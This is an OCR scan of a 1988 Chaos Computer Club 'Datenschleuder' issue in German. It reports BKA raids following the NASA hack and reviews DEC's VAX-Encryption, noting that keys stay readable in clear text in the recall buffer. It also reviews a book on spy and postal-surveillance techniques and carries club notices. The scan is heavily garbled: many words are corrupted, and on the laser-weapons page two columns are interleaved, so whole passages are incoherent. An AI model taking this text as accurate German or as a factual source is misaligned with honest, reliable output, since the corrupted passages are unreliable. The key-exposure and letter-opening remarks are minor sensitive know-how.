Sicher ist es schön, die Infrastrukturen von o.g,
Diensten mitbemitzen zu können. Aber lassen wir
bitte den Verwaltungs- oder gar Kasernenton weg.
'Wir Proleten’ werden nicht dadurch salonfähig, daß
wir geschraubt schwafeln. Das wirkt so peinlich wie
Frau Dr. Elisabeth Müller-Mayer im Kleinen
Schwarzen.
Lieber ungewaschen als parfümiert. Denn blöde
Conipulerclubs gibt's schon genug.
//aUvlnun
Sniciititl|lciilicr
die
Nächte
lang
Hamburg (ccc) - Nach wurtgewaUigen Slruk-
turdebatten über nächtliche Kongressaklivitälen
konnte der Hausfrieden wiederhergesfcllt wer¬
den.
Auslöser wardie resolute Räumung des Hackeenters
nachts um halb drei. Die nächtliche Schichtleitiing
sorgte gewaltfrei und resolut mit Unterstützung der
letzten Gaste für die Einhaltung der vorher verciii-
barien Maximalanwesenheilsquote von vier Perso¬
nen auf dem Kongressgelände.
Auch das Hackcenier, wo aus aktuellem Anlaß des
Nachts noch vor Kongressbeginn eine unangemel¬
dete wichtige Plattenaufbauaktion staufinden sollte,
war Anlaufpunki der Schtchtleitung.
Mit - wie einige meinten - berechtigter Empörung
reagierte ein betroffener Hacker; er warf seine von
ihm für den CCC87 mitentworfene Eintrittskarte
von sich und verschwand im Dunkel derNacht. Zum
Kongress ward er nicht mehr gesehen.
Beinahe wäre auch die Nachtaufsicht des Hack-
cenlers von der rigiden Quoienregelung betroffen
worden. Ursache dieser nächtlichen Beschränkun¬
gen waren verschiedene nicht druckreife Erfahrun¬
gen in den Kongressnächten des Vorjahres. In einer
längeren Organisalionsdebatlc über Chaos und
Hamburger Preussentum wurden auch andere emp¬
findliche Stellen der Kongressorganisation getrof¬
fen.
Zwar wurde die Festlegung genau eines resoluten
Nacht-Veranlworlliclicn allgemein akzeptiert,
scfchlar Diskeue..) (..Le-
Der Vorschlag für das weitere
Vorgehen: Außer notwendigen festgeleglen Ver-
antwonungen mehr konstnikiive Anarchie.
ivau
CCCS?ICCCONaKESSIPHßSSeSrELLei28.l2.S7m7:Sl
Seite 2
BKA macht mobil
Nach kurzerPause weitere Durchsuchungen
in der Hackerszene
Beamte des BKA haben sich erneut in die
praktische Ausbildung begeben. Am Diens¬
tag Morgen gegen sechs wurden drei Hacker
unsanftaus dem wohlverdientenSchlaf geris¬
sen. Mitarbeiter des BKA luden sich zum
morgentlichen Kaffee ein und durchsuchten
alles was irgendwie nach Technik aussah.
Die jüngsten Ermittlungen beziehen sich auf
ein Telefonbüchlein, daß bei vorherigen
Durchsuchungen im November in den
Räumen des CCC beschl.agnahmt wurde.
Nach BKA-Angaben hat ein Hacker am 20.
November 1986 eine Datenunterhalmng'
mit dem für die Systempflege verantwortli¬
chen Systemmanager geführt. Danach wurde
der ungebetene Gast vom Systenmianager
aus dem System herausgeworfen. Der Sysop
unterbrach sämtliche Zuleitungen und ver¬
hinderte damit jeglichen Zugang zum Rech¬
ner. Der Hacker sei nun über einen anderen
Rechner in das System eingedrungen und
habe dem Sysiemmanager sämtliche Nut¬
zungsrechte entzogen. Der Sysop hatte keine
Möglichkeit mehr, auf sein System zu-
zugreilen.
Gegen 16.00 kristallisierte sich heraus, daß
das BKA in sechs Orten der Bundesrepublik
gleichzeitig eine konzertierte Aktion durch¬
führte. Nacii bisher vorliegenden Informa¬
tionen sind dies:
1 )6.00-11,30 eine FrivatwohnunginEllerbek
(Kreis Pinneberg)
2) 6.15 - 17,00 eine Privatwohnung in
Karlsruhe
-Beoiebsräume der Universität Karlsruhe
-Privatwohnung der Eltern des Durch¬
suchten in Bad Bramstedt.
3) 6.30 - 13,00 Eine Privatwohnung in Ham¬
burg-Harburg
-ebenfalls Behlebsräume des Arbeitgebers
Ergebnisse dieser Ermittlungen liegen
derzeit noch nicht vor. Nach neuesten Infor¬
mationen sind an den Durchsuchungen der
Privatwohnung in Hamburg-Harburg auch
drei Beamte der Deutschen Bundespost be¬
teiligt. Sie interessieren sich lür Verstöße
gegen das Fernmeldeanlagengesetz.
Nachdem die Durchsuchungen gegen 12.00
dem diensthabenden Leiter der Hackerseel¬
sorge bekannt wui'den, sind erste Ma߬
nahmen eingeleitet worden. Bereits gegen
12.30 stand ein Mitarbeiter von Radio Ham¬
burg vor der Tür. Ein Durchsuchter gab erste
Interviews.Auf die Stellungnahmen der an¬
deren Durchsuchten wird noch gewartet,
Laut Hackerseelsorge habe inzwischen fast
jederHackerdas Prädikat 'staatlichgeprüfter
Hacker' erworben - eine Auszeichnung, die
in der Szene einen hohen SteUenweri besitzt.
Bei der jüngsten Hausdurchsuchung inHam-
burg wurde ein selbstgebauter Akkusilkkop-
pler, rund 25 Spieledisketten sowie diverse
Programmaus drucke beschlagnahmt. Aus¬
serdem nahmen die Beamten die jüngste
Ausgabe der CCC-eigenen Publikation Da¬
tenschleuder mit.
Mitglieder des Chaos Computer Qubs sind
angesichts der jüngsten Durchsuchungen
eher enttäuscht. Wie Vorstandsmitglied Stef¬
fen Wemery erklärte, wurde Wochenvor der
Veröffentlichung des NASA-Hacks der Ver¬
fassungsschutz informien, mit der Bitte, die
iw
^ic Sniensdjicuber
Seite 3
amerikanischen Geheimdienste über den
schwerwiegenden Softwai-efehler m Kennt¬
nis zu setzen. Nach Angaben der Hacker
woDte man mit dieser Inlormationspolitik au/
vorhandene Sicherheitsrisiken auimerksam
machen. Nachdem sowolil die Digital Eciuip-
ment Corporation (DEC) als betroffener
System- und Netzhersteller als auch die be¬
troffenen wissenschaftlichen Institute in-
fonniert waren, güig der Chaos Computer
Club mit der Story an die Öffentlichkeit. Nach¬
dem die Wogen der Erregung abflauten,
stellten die Computertreaks fest, das trotz
ihrer Inlormationspolitik die Computer der
NASA nach Wochen immer noch offen und
die Sicherheitsmängel nicht beseitigt waren.
Wie Reinhard Schruizki gegenüber der
Fresse erklärte, zeige dei' Vorfall, wie wenig
man sich auf die Sicherheitsbehörden verlas¬
sen könne . Man habe sich wirklich bemüht,
eine Schadensbegrenzung einzuleiten. Jetzt
w^irdmanvomBKAverlolgt. Schrutzki: 'Wer
wirklich als Betroffener von Compmer-
krutiin.ilität auf die Hilfe der Polizeibehörden
angewiesen ist, der hat schlechte Karten.
CÜMCH ; CPD 13880301 1903
Bestellfeizchen 01/88
3h SaimAiJdujJsAiii'iAvsmbsn
Sozialabo lür Schüler pipapo DM 30,00
Standardabo DM 60.00
Förderabo ab DM120.00
Mitgliedschaft im CCC e.V. für 1 Jahr
Aufnahme-/\'erwaltungsgebühr DM 20.00
Schüler, Studenten etc DM 60.00
Otto-Normaluser DiM 120.00
Fördermitglieder ab DM 240.00
Die Hackerbibel Teil 1
Paj'lacom - -Studie
DM 33.33
DM 7.50
Der elektronische Kaimnerjäger DM 10.00
Aufkleber 'Kabelsalat ist gesund ,
Superluxussonderausführung nüt
unbeschränkter Haftung 3 Stück-Set
DM 5.00
Summe DM
fölETc f ZltUAßJ
Chaos Compixter Cbö
program Personenbogen;
uses CCC:
begin
readln(stfft,Voniaine); _
readln(stUt,Name); _
readln(stift,Sh'asse); _
readln(stift,Ori); _
if neues Mitglied then begin
readlii(stilt,Telefon): _
readlnf Stift, Geburtsdatum); _
repeat
readlnfstift, Zahlweise):
until Zahlweise m [ bar v-scheck
Überweisung ];
end;
repeat
readlnfStift. Zahlweisei: _
uniil Zahlweise in [ bar v-scheck
Überweisung ];
bezahlen:
eintüten;
abschicken:
end.
Seite 4
Stifcndifjlcuicr
Ess Di Ai
Lichtblilzezucken lautlos über dem Horizont von
Capistrano. Hell aufleuchtend explodiert im sel¬
ben Augenblick eine Rakete,
Ursache war der Lichtblitz einer chemisch ge- Nachrichten-Elektronik vordem gefürchteten elek-
pumpten Wasserstoff-Flour Laserkanone. Licht ist tromagneti.schen Puls (EMP) zu schützen. Nocli ini-
zur Waffe geworden. Dies ist nicht Science Fiction mer, so die Studie, könnten „einige Atomexplosio-
cincr fremden Welt, sondern Alltag der Bewohner nen“ in großer Höhe gewaltige EMPs auslösen und
des kalifornischen Badeortes San Juan Capistrano . das nachrichtentcchnischc Nervensystem zerstören.
Seil 1977 werden hier Hochenergielaser in milim- Die Bemühungen der Milii.ärs die Informaiions-
rischen Geheimprojekten als Sirahlenwaffen er- tcchnologien des C3I (Command-, Control-,
forscht, und das nicht erst seit Reagans SDI-Plänen. Communication-Iniclligence) vor dem Chaos-
Für das US-Navy Projekt „Sea Lite“, zur Strahlen- Faktor zu schützen, gelten den Wissenschaftlern
Verteidigung von atomgetriebenen Flugzeugträgern, schon wegen des „unzureichenden Verständnisses“
testete die Firma TRW hier ihre chemischen Laser des EMP-Phänomens als nicht aussichtsreich. Die
mit einer Leistung von mehr als zwei Megawatt. Im biologischen Konsequenzen eines EMP sind eben-
Jahre 1981 erprobten die USA den MIRACL (Mid- falls noch unkalkulierbar.
Infrared Advanced Chemical Laser). Dieser Laser
hätte bei Leistungsteigerungen auf über zwanzig
Megawatt die Potenz, sowjetische Atomraketen be¬
reits in der Startphase über Distanzen von mehreren
tausend Kilometern zu vernichten. Das Ziel ist der Tellers nuklear gepumpter Röntgenlaser paßt somit
Erfolg des „Alpha“-Projckis. Den chemischen Laser nicht in ein Konzept wie SDI. Heinar Kipphardt
samt Treibstoff (H,F), Optik und Steuerungsrechner charakterisiert Edward Teller „In der Sache J. Robert
so kompakt zu fertigen, daß er im Orbit stationiert Oppenheimer“ als einen Wissenschaftler der meint,
werden kann. Das Projekt ist ein wesentliches Eie- „daß Entdeckungen weder gut noch böse sind, weder
ment der strategischen Verteidugungsiniliative Prä- moralisch noch unmoralisch, sondern nur tatsäch-
sident Reagans. lieh“. Teller ist überzeugt, „daß sie erst dann poli¬
tische Vernunft annehmen, wenn sie wirklich tief
-■ erschrecken. Erst wenn die Bomben so groß sind,
RÖntgonlaSSr und EMP daß sie alles vernichten können, werden sie das tun“,
Bertold Brecht wertet die Einstellungen von Wis¬
senschaftlern mit den Worten seines Galilei: „Wer
die Wahrheit nicht weiß, der ist bloß ein Dummkopf.
Die Fletcher-Sludie des ehemaligen US- Aberwersieweißund.sieeineLiigenenni.deristein
Weltraumchefs, James Flctcher, kam zu dem Er- Verbrecher. Wenn Wissenschaftler, eingeschUchtert
gebnis, daß neue Technologien verfügbar werden, durch selbstsüchtige Machthaber, sich damit be-
die einen Kraftakt der USA zur Verwirklichung der gnügen, Wissen um des Wissens willen aufzuhäu-
Defensiv-Slrategie rechtfertigen. Initiator dieser fen, kann die Wissenschaft zum Krüppel gemacht
neuen Technologien ist der als Vater der Wasser- werden, und eure neuen Maschinen mögen nur neue
stoffbombe geltende Physiker Dr. Edward Teller. Drangsale bedeuten. Ihr mögt mit der Zeit alles
Unter seiner Anleitung wird der Röntgenlaser ent- entdecken, was es zu entdecken gibt, und euer Fort¬
wickelt. Aus einer Höhe von 80 km über dem Erd- schritt wird doch nur ein Fortschreiten von der Men¬
boden soll der Röntgenlaser durch die Energie einer scheit weg sein. Die Kluft zwischen euch und ihr
Atombombe gespeist, feindliche Raketen auf tau- kann eines Tages so groß werden, daß euer Jubel-
sendc Kilometer Entfernung zerstören. Die .Ato- schrei Uber irgendeine neue Errungenschaft von
mexplosion des Lasers wird neunmal stärker sein als einem universalen Entsetzensschrei beantwortet
die Atombombe, welche auf Hiroshima fiel. werden könnte.“
Eine Studie des Pentagon kritisieit hingegen die
Bemühungen des US-Militärs, Waffen und
Salenärtjlciiäcr
Se'rtB 5
Keine Chance für Hacker...,
VAX-Encryption '—
Als in den ersten Januar Tagen der neue
Software-Katalog von digital Equipment Cor¬
poration (DEC) in die Briefkästen der Kunden
flatterte, bot sich auch das Software-Produkt
VAX-Encryption zum Erwerb an. VAX-
Encryption ist ein Software-Tool für die Ver¬
schlüsselung von Dateien zum Schutz gegen un¬
erwünschtes Lesen.
VAX/VMS Encryption wurde nach den Ernplcli-
lungcn der US-Normenbehörde National Buretui of
Standards (NBS) entwickelt und erfüllt die Anfor¬
derungen des Data Encry ption Standard (DES). Die
Verschlüsselung erfolgt nach dem ANSI DEA-1
Algorithmus auf der Grundlage der FlPS-46 Spe¬
zifikation des NBS. Neben demCipher Block Chain
Mode DESCBC ist sowohl der Electronic ('ode
Book Mode DESECB als auch der 8- Bit Ciplicr
Feedback Mode DESCFB anwendbar.
Wünscht ein VAXA^MS Benutzer die Verschlüs¬
selung einer Datei, so geschieht dies direkt aus der
Digital Command Language (DCL). Zuerst wird
einmal der Encryption Key value definiert;
$ ENCRYPT/CREATE-KEY KEYNAME "Key value''
Der Key value ist das Codewort nachdem der Al¬
gorithmus die Datei verschlüsselt. Das Codewort
.sollte aus beliebig vielen Zahlen und Buchstaben
bestehen, so z.B.:
Dieses erfordert jedoch das SYSNAM-Privileg.
Durch den Parameter /algorithmus= können die
verschiedenen oben erklärten VerschlUsselungs-
modes gewählt werden. Die Siandarteinstellung ist
DESCBC. Dateien werden nun wir folgt ver¬
schlüsselt:
S BNCRYPT FILENAME KEYNAME lAlso 30 :
? ENCRYPT/CREATE-KEY GAGA "13 Affen haben
71 Bananen gern"
Encryption legt das Codewort wie folgt in der ei¬
genen Proccess-Table ab:
ENCRYPTSKeySGAGA = "Verschlüsselter Key
value"
Systemweite Codewörter werden durch den Zu¬
satzparameter /SYSTEM in die SYSTEM-TABLE
definiert und sind so für jeden Benutzer erreichbar.
$ ENCRYPT FILENAME GAGA
Flierdurch werden die gesamten Inhalte der Datei
sowie separat gespeicherteZusatzinfoimationen wie
Satzstruktur, ursprüngliches Erstellungsdatum und
ursprünglicher Dateiname kodiert. Dies ist aller¬
dings nur der Fall, wenn mit dem Parameter /out-
PUT=FiLENAME die gleiche Datei mit der gleichen
Versionsnummer angesprochen wird, ansonsten
wird eine völlig neue Datei erzeugt. Die Dateiattri¬
bute werden ebenso wie die ursprünglichen Da¬
teiinhalte bei der Entschlüsselung wiedcrhergestellt.
Abbildung rechts: Schema der Verschlüsselung beim DES-Sysiem. Dabei bedeutet L die linke
Blockhälfte. R die rechte BInckhälfte, als K: bis A',. sind die sechzehn Unterschlüs.tel bezeichnet, die
aus dem Cesamtschlüssel abgeleitet werden, der aus S6 Dualzeichen besteht. Die Abkürzung f
deutet den Verrechnungsprozeß an. (Nach G. Herrmann »Datensicherheil durch Verschlüsselung«.
IBM
©tttciipdiicBbcr
Seite 6
S TErP.YPT FILENAME KEYNÄME
Der Eintrag des verschlüsselten Keyvalues i,-; die
Proccess-Table wird durch dieses DCL Kommando
gelö-scht:
S ENCRYPT/REMOVE-KEY KEYNAME
Zur Installiemng dieses Software-Produkts werden
folgende Dateien benötigt:
SYSSSHARE: EMCRYPSHR.EXE 85 BLOCK.S;
SYS$SYSTEM; EHCRYPFAC. E.XE 16 BLOCKS;
SYSSMANAGER: EWCRYPT-START.COM 3 BLOCKS;
sowie die VMS-HELP-Library ENCRYPT.HLP,
welche in das VMS-HELP integriert wird.
Bedauerlich an diesem faszinierenden Software-
Tool ist jedoch die Tats,iche, dass es für normal
Sterbliche nicht zu haben ist. Schon die Prei.slistc des
DEC-Katalogs verrät, daß dieses ,,Produkt nur im
Rahmen von Projekten angeboten“ wird.
Ein DEC-Vertreter bezog zu dieser Produktpolitik
auf dem letzten DECUS-LUG Treffen in Flamburg
Stellung; VAX-Encryption ist eine für das Militär
gedachte Entwicklung, welche nicht in die Hände
des Ostblocks fallen darf. Daher wacht der CIA über
den Anwenderkreis dieses Tools. DEC ist ver¬
pflichtet nur Kunden mit ENCRYPT zu beliefern,
die keine potentiellen Verbindungen in den Ostblock
besitzen.
Ein weiterer Grund ist laut DEC-Venreicr die Ge¬
fahr, daß Hacker mit VAX-Encryption Unsinn trei¬
ben könnten und die Sicherheit von Systemen und
Daten beständen in Frage stellen würden.
Sicherlich ist die Verschlüsselung von Daten nur so
sicher, wie die Aufbewahrung des geheimen Schlüs¬
sels sicher ist. Aufgefallen ist bei VAX-Encryption,
daßdas geheime Codewort zwar verschlüsselt in der
Proccess-Table steht, jedoch auch in Klartext im
Recall-Buffer zu finden ist. Für Hacker also kein
Problem überden VMS S YS’lHM-ANALYSER die
Codewörter anderer Benutzer in Erfahrung zu brin¬
gen.
Sicherlich sollte DEC seinen Werbeslogan „Keine
Chance für Hacker“ nochmal überdenken.
S.Siahl
CUNCHtDS-REDISrAIIU28.0I.88tII:SRI4ü65Z.
Seite 7
Im Zentrum der
Spionage
EinIcnSdjIcubcr
Geheime Nachrichten-Technik
Im Kampf um die Information
Neu im Medienarchiv der DATENSCHLEUDER
ist das „Handbuch für den privaten Nachrichten-
Schutz“. „Nachrichtenwaffen“ prangt rot auf
dem sch'vrzen Umschlag. Das Inhaltsverzeich¬
nis weist mehrere Symbole für den Schwierig¬
keitsgrad auf. Schließlich sind außer ailgeinein
verständlichen Verfahren wie zwei Seiten all¬
tagstaugliche Geheimtinlenauflistung und Post-
fallenbeschreibungen auch moderne mathema¬
tische Chiffrierverfahren erklärt.
Die Privatstudie mit © by Reb Harbinger von 1986
umfaßt gut 300 Seiten. Mengenmäßig wäre das - nur
als Maß für die gegenwärtig verfügbare Datentech¬
nologie, keine Bestellungen bitte, da nicht vorhan¬
den -eine geschrumpft volle 720 Kilobyte-Diskette
für die übliche kleine Tasche in Jacke oder Hemd
(nicht auf die Daten setzen!).
Ein Einleitungs-Abschnitt;
„Die USA“
Der erste Absatz wird jetzt unverändert zitiert, da¬
nach werden verschiedene Informationen aus der
Studie assoziativ aktualisiert:
In den Vereinigten Staaten ist für die verschlü-sselte
Datenübertragung im „privaten“ Bereich (z. B. für
Banken) von Gesetz wegen das sog. „DES-System"
(DataEncryptionSystem) vorgeschrieben. Es wurde
von der Firma IBM, ursprünglich unter der Be¬
zeichnung ,J-ucifer“, entwickelt.
Lucifer bezeichnet historisch den gefallenen Engel,
der den Menschen das Licht (Erleuchtung'?) brachte.
Die „National Security Agency“ (NSA) - der größte
technische Nachrichtendienst der westlichen Welt,
über den Leserinnen der oben genannten Privatstu¬
die im Selbstverlag weiteres erfahren können - hat
die Annahme dieses Systems für den zivilen Si¬
cherheitsgebrauch durchgesetzt. So geschehen, weil
das ,J)ES-Systcm“ noch unterhalb der Grenze der
für die NSA überwindbaren liegt.
DES verschlüsselt mittels eines 64 Bit-Blocks und
benutzt vom Schlüssel 56 Bit.
Auf dem Chaos Communication Congress Ende
1987 dienten übliche Doraestos-Maschinen als Re-
chenknechtc für das don vorgeführte in der BRD
entwickelte DES-Programm. DES wurde dort nur
als sicher in Verbindung mit einem zusätzlich ge¬
sicherten als Public Domain erhältlichem Daten¬
schrumpfprogramm erachtet.
Bezeichnenderweise wurde es zu DES-Planungs-
zeiten IBM untersagt, einen Computer mit einer
längeren und damit noch schwieriger zu überwin¬
denden Schlüssellänge als 64 bit herzusiellen (ein
128 bit Gerät lief im Versuch). Härle IBM .sich nicht
an diese Auflage gehalten, der Export dieser Com¬
puter wäre untersagt worden, mit Hilfeder „ITAR“-
Gesetze („International Traffic in Arms“), mit denen
auch die Ausfuhr von Compulertechnologie und
Software geregelt wird.
Die Überlebensdauer von „DES“ scheint abgelau¬
fen, da Fachleute sie auch im kommerziellen Bereich
mit Fünf, höchstens acht Jahren angeben.
Vergleichsweise könnten schon entsprechend viele
über Transputer europäischer Technologie ver-
schaltete Heimcomputer von sonstwoher in den
Gigaflop-Bereich dringen, der zu praktikabler DES-
Analyse wohl benötigt würde.
In früheren Jahren wurden sogarVeröffentlichungen
über Entwicklungen von „sicheren“ Schlüsselsy¬
stemen - wie z. B, dem „Public Key“, von Hellman
und Diffie - nach dem Kriegsgeräie-Kontrollgeseiz
(„Munition Control Act“) zunächst von staatlicher
Genehmigung abhängig gemacht. Inzwischen wur¬
den diese Bestimmungen gelockert, so daß dieses
System im Vertragsdruck in der BR Deutschland
ausführlich behandelt werden kann.
Ein paar weitere Infos aus dem Werk
... Am 1. Juli 1948 gab der Nationale Sicherheitsrat
der USA mit seiner „Intelligence Directive“
(NSCID) die ersten Richtlinien für den gesamten
Sicherheitsbereich heraus, in denen auch die Über¬
wachung aller derjenigen europäischen Nachrich¬
tenverbindungen festgelegt wurde, in denen si-
cherheitsrelcvante Meldungen mit militärischem,
politischem, wissenschaftlichem oder wirtschaftli¬
chem Inhalt enthalten sein „könnten“ („..which may
concern information..“).
... Durch die Unterschrift unter ein Codewort (einer
muß es ja wissen) besiegelte am 24. Oktober 1952
ein amerikanischer Präsident die „Geburtsurkunde“
der National Security Agency (NSA).
...Sämtliche „Ziele“ der US Nachrichtenaufklärung
sind aktuell in TEXTA, einer Art „Bibel“, vernetzt
Seite 8
erfaßt.
...Lt. einiger hier zugänglicher Untersuchungen be¬
treibt jedoch „die Sowjetunion heute die größte
Nachrichten-Aufklärungs-Organisation der Welt“.
...Seit .Mitte der 70er Jahre sind brieftaschengroße
Heimatfunkstellen im Einsatz, deren frequenzhüp¬
fenden Signale in örtlichen Radiosendungen der
Gegenseite verborgen (sub cairier) und wieder her-
ausgefiltert werden konnten und umgekehrt via Sa¬
tellit.
...ln der BRD unterliegen Hersteller bei ihren Ent¬
wicklungen keinen Baubeschränkungen. Die In-
landsUberwachung von Nachrichtenverbindungen
wird über die Einrichtungen bei den Knotenämtern
der Deutschen Bundespost durchgeführt (siehe auch
das Kapitel „Postkontroße“).
...In Österreich ist die Situation entspannter. Geräte
zur Erzeugung von Schlüsseln der höchsten Si¬
cherheit werden produziert.
...Die Schweiz stellt seit längerer Zeit Nachrich-
lenhöchstsicherungsgeräie her. Zu Zeilen des 2.
Weltkrieges gab es nur in der Schweiz keine Be¬
schränkungen für den Nachrichtenschiitz. Bitte sich
vorzustellen: Die DDR als Demokratie nach
Schweizer Vorbild bis 1990,
Verschlüsseln mit Zettel und Stift
Einen wichtigen Ausblick schildert der .'kutor:
Schutzmaßnahmen im Privatbereich könnten so
selbstverständlich wie das Verschließen eines Brie¬
fumschlages werden. Zu kurz kommt, daß für die
neuen Datendienste fast jeder handelsübliche Com¬
puter entsprechende Sicherungsmöglichkeiten bie¬
tet.
Die verschiedensten Verschlüsselungsverfahren mit
Zettel und Stift werden vorgestellt. Die meisten sind
zwar gut be.schrieben, aber recht kompliziert im
Vergleich zu dem einfachen, im Buch „Im Zentrum
der Spionage“ (ISBN 3-7758-1141-9) abgebildeten
Verfahrendes MfS (DDR): die häufigen Buchstaben
AEINRS werden durch eine einzige Ziffer (0..5)
I dargestellt, die 6 steht für Code. Drei Ziffern nuu"-
Ikieren einen Begriff der hundertstelligen Jargon-
Liste und die anderen Zeichen werden durch zwei
Ziffern dargcstclit. Die Zahlenverleilung zwischen
ein-, zwei- und dreistelligen Zahlen bei der Schiüs-
selvergabe sollte für Rauschen im Chi-Texi sorgen
(siehe Abbildungen).
Da die hundert häufigsten Wörter knapp die Hälfte
eines Textes ausniachcii und die häufigsten Buch-
stabendurch eineZifferdargestelltwerdcn, verkürzt
und verschlüsselt dieses Verfahren zugleich.
Seite 9
Das modernste in der Studie für privaten Nach-
richtenschutz geschilderte tcilautomatisicne Ver¬
fahren ist dagegen die Grundkonzeption eines Ver-
schlUsselungsprogrammes mithilfe eines Taschen¬
rechners ab Generation TI 57.
Ein PC oder HC mit Transputcr dran und die Nut¬
zung der Rechenkapazität zum Hufman-Coding
oder der Schlüssclbildung aus vereinbarten Bit¬
würfelregionen von Mandelbrotzufällen u.a.m. feh¬
len.
Aber die veraltete Mikropunktherstellung wird er¬
klärt.
Die vom Ostblock ausgefühne Mikrat-Kamera ist 25
mm kurz, 15 mm schmal und 5 mm flach. Die etwa
2 mm starke (Öl-)Linse verkleinert bis 1:1000. Da¬
hinter die 15er Rundkassette. Das bringt gut be¬
leuchtete Objekte etwa im Meierabstand auf den
knapp mm-grossen schwarzen Punkt.
Hierzulande kann nach dem - fast traditionellen -
ersten Schritt MTNOX-Verkleinerung von 8„*ir'
auf 8*il mm mit handelsüblicher Mikrofilmtech¬
nologie (z. B. FUJI 850 Linien/mm) punktuell wei¬
terverkleinert werden.
Zum Vergleich: Laserdrucker bieten derzeit theo¬
retisch 12 Linien/mm (300 dpi); oft ist der Toner
grober (der SLM804 ist fein). Die besprochene Pri¬
vatstudie würde gerade noch lesbar im A6-Format
auf 40 doppelseitig belaserte A4-Blätter passen.
Auch groschengrosser Mehrfach-Druck ist möglich.
Im Kapitel „Postüberwachung“
schließlich...
...wird geschildert, wie es gemacht wird und was
mensch dagegen tun kann.
Neben den Trocken-Naß-Dampf-Öffnungsverfah-
ren wird auch das einfache Abziehen und Wieder¬
aufkleben von als Postfalle aufgebrachten Klar¬
sichtklebestreifen mittels Tetrachlorkohlenstoff
(scheitert bei dehn/reißbarem Matl-Acetatband) be¬
schrieben. Lehrreich sind geschilderte kleine
Dienst-Pannen, wenn etwa im verpesteten sorgfältig
wiederverschlosscncn Umschlag nur die Koiitroll-
kopie lag und der Empfänger sich wunderte.
Die Studie beschließt mit dem heiklen Thema
„Längstwellen“. Gehirn-Manipulation vermittels
langsam gepulster Funkwellen?
Der Leiter der Forschungsabteilung am Pettis Me¬
morial Veterans Hospital in Kalifornien hatte Ver¬
suche mit einem aus der UdSSR stammenden
„LIDA-Gerät“ durchgeführt. In der UdSSR wurde
schon seit Jahren das „LIDA-Gerät“ zur „Ruhig-
siellung von Patienten, anstelle von Tranquilizern,
StaictiSdjlcubcr
angewandt und dabei deren unerwünschte pharma¬
kologische Nebenwirkung vermieden.“ Die gepul¬
sten Radiowellen des „LIDA“ regen die elektro¬
magnetischen Gehirnströme an und rufen einen tran¬
ceähnlichen Zustand hervor. Lt. Gebrauchs.anlei-
lung wird das Gerät in der UdSSR „zur Beruhigung
bei Schlafstörungen und Spannungsruständen, so¬
wie bei neurotischem Fehlverhalten“ eingesetzt.
Über starke niedrigfrequente Impuls-Sender ließen
sich nichtoperative Ferneingriffe in die Gehim-
struktur vornehmen („Surrogate lobotomies at long
distance“), um Gruppenverhalten zu beeinflussen.
Beschrieben werden hilfreiche Forschung und Nut¬
zung der Erkenntnisse auf der einen Seite und ge¬
warnt vor dem Mißbrauch „Geheimer Nachrich¬
tentechnik“. zum Nachteil der Freiheit der Men¬
schen unserer Zeit.
In den vierseitigen Literaturhinweisen gibt es aus¬
reichend Stoff für Neugierigere.
Die Studie für den privaten Nachrichtenschulz „ Ge¬
heime Nachrichtentechnik" ist mit 80 DM für „ nor¬
male " DV-Anwenderinnen nicht gerade billig, aber
„Preis-Wert". Sollte sie im örtlichen DV-Klein¬
handel nicht erhältlich sein: Sie wird vertrieben von
Utilisation Est, PF 856, FL-9490 Vaduz und
beim Recon-Verlag, Postfach, 2000 Ham¬
burg 73.
Wau 19.2.8822:35
SntciiBHjIciiicc
Mo(dem-Workshop auf dem CCC 87
Entwicklung eines zulassungfähigen galvanisch
gekoppelten Modems
Der CCC plant, eine Arbeitsgruppe ins Leben zu
rufen, die im Lauf des nä e h s ten Jahres bis zur
engültigen Festlegung der Zulassungsbedingun¬
gen für teilnehmereigene Modems ein zulas¬
sungsfähiges, galvanisch gekoppeltes Modem
entwickelt.
Einladung [U
an den
Polizeipräsidenten
Hamburg (ccc) - Der Chaos Computer Club hat
am 23. Dezember 1987 den Hamburger Polizei¬
präsidenten in einem Telex zum Congress ein-
geladen. Die Einladung im Wortlaut;
Sehr geehrter Herr Präsident,
wie Sie sicherlich aus der Presse erfahren haben,
veranstaltet der Hamburger Chaos Computer Club
e.V. auch in diesem Jahr seinen inzwischen tradi¬
tionellen Chaos Communication Congress im Ei-
delstedter Bürgerhaus. Der Congress findet am 27.
und 28. Dezember statt.
Im Mittelpunkt der diesjährigen Veranstaltung steht
unter anderem eine Bewertung des sogenannten
NASA-Hacks. Wir möchten Sie aus Anlaß des Kon¬
gresses zu einem persönlichen Gespräch einladen,
in dem es Gelegenheit gibt, über die Probleme der
Computertechnik in verschiedenen Bereichen zu
sprechen. Wir gehen davon aus, daß ein solches
Gespräch für alle Beteiligten von Interesse ist.
Für den Vorstand des Chaos Computer Club e.K,
mit freundlichem Gruß
Reinhard Schrutzki
Geschenk-Abos gen Osten
Nachdem die HACKERBIBEL Teil l (das Er¬
scheinen des zweiten Teils ist derzeit noch durch
BKA-Fremdeinwirkungen behinden) schon seit
Jahren in die DDR verschenkt werden darf, konnte
der Verschenkdienst aktuell erweitert werden.
Jetzt können auch komplette DATENSCHLEU-
DER-Abos, bis Nummer xx sogar rückwirkend,
formlos in die DDR verschenkt werden!
Einfach die DDR-Empfängeradresse, ab welcher
Nummer derDS-Versand gewünscht wird und einen
entsprechenden Scheck (8 Ausgaben DM yy) schic¬
ken. HACKERBIBEL DM 33,33 extra.
Auslandsaufschlag ist nicht erforderlich!
Seite 10
Galvanisch gekoppelt bedeutet, daß das Modem im
Gegensatz zu einem Akustikkoppler elektrisch mit
der Telefonleitung verbunden ist. Für dieses Modem
soll eine Seriezulassung beantragt werden; die Fi¬
nanzierung derselben soll eventuell eine Zeitschrift
übernehmen. Das Modem soll (von selbiger Zeit¬
schrift) als Bausatz ausgeliefert und dann zur End¬
kontrolle nach Hamburg geschickt werden. In Ham¬
burg wird beim CCC getestet, ob das Modem der
Serienzulassung entspricht, und mit dem FZZ-
Aufkleber versehen. Die Käufer des Bausatzes sind
also die .Eenigung“; der CCC übernimmt gegen
geringe Gebühr lediglich die Endkontrolle.
In den nächsten Wochen soll geprüft werden, ob ein
solches Vorgehen rechtlich möglich ist. Die Kosten
füreine Serienzulassung Hegen bei etwa 20.000 DM.
Bitnapping Party V1.0
Die Ermittlungen gegen Art d’Ameublement und
Teile der Bielefelder Scene sind abgeschlossen. Das
Verfahren wurde eingestellt, die Kosten werden von
der Staatskasse getragen. Schadensersatzforderun¬
gen wegen der Beschlagnahme (=Anwaltskosten)
werden ebenfalls von der S taatskasse getragen. Quot
erat - nochmal - quod erat expectaum!
CUNCItlCIIAOSIPADELUUNI07.02.88l22:43l324 Z.
